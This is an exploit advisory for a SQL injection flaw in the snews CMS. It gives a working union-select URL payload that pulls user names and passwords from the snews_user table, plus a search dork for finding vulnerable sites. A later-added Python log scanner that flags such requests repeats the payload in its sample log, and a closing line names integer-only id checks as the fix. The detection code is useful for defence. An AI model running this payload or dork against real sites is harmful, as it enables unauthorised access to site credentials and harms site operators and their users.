Title: CMS snews SQL Injection Vulnerability
Author: onestree
Download: http://snewscms.com/
Tested on: ubuntu 12.10 / win 7
Keyword: inurl:"tanyakan pada rumput yang bergoyang"

*************************************************************
SQL poc:

http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]

Example:

http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
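
Detection sketch for requests of the shape shown above, added here as an example and not part of the original advisory: it scans access-log lines for snews.php?act=shownews requests whose id is not a plain integer. The combined log format, the assumption that id is always a numeric article id, and the names normalise, audit and SAMPLE_LOG are illustrative; the log entries are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Request line inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# SQL keywords that have no business inside a numeric article id.
SQL_TOKENS = re.compile(r'\b(union|select|concat|from|where|like)\b', re.I)

def normalise(value):
    """Undo repeated percent-encoding, then turn /*...*/ comments into spaces."""
    for _ in range(3):  # bounded loop, covers double encoding
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    # An unterminated trailing /* is treated as a comment as well.
    return re.sub(r'/\*.*?(\*/|$)', ' ', value, flags=re.S)

def audit(lines):
    """Return (line_number, id_value, reason) for suspicious shownews requests."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        query = parse_qs(url.query, keep_blank_values=True)
        if not url.path.endswith('/snews.php') or query.get('act') != ['shownews']:
            continue
        for raw in query.get('id', []):
            if re.fullmatch(r'[0-9]+', raw):  # assumption: ids are plain integers
                continue
            tokens = sorted({t.lower() for t in SQL_TOKENS.findall(normalise(raw))})
            reason = 'sql keywords: ' + ','.join(tokens) if tokens else 'non-numeric id'
            findings.append((n, raw, reason))
    return findings

SAMPLE_LOG = [  # constructed entries using documentation address ranges
    '192.0.2.10 - - [01/Jan/2013:10:00:00 +0000] "GET /snews/snews.php?act=shownews&id=23 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2013:10:00:05 +0000] "GET /snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/* HTTP/1.1" 200 4096',
    '198.51.100.7 - - [01/Jan/2013:10:00:09 +0000] "GET /snews/snews.php?act=shownews&id=23%2527 HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2013:10:00:12 +0000] "GET /snews/index.php?id=abc HTTP/1.1" 404 312',
]

if __name__ == '__main__':
    for finding in audit(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule, enforced on the id parameter before it reaches the query, is the corresponding fix on the application side.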

Thanks:

Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell

indonesiancoder - moeslimh4x0r - go-coder

spesial my hunny :*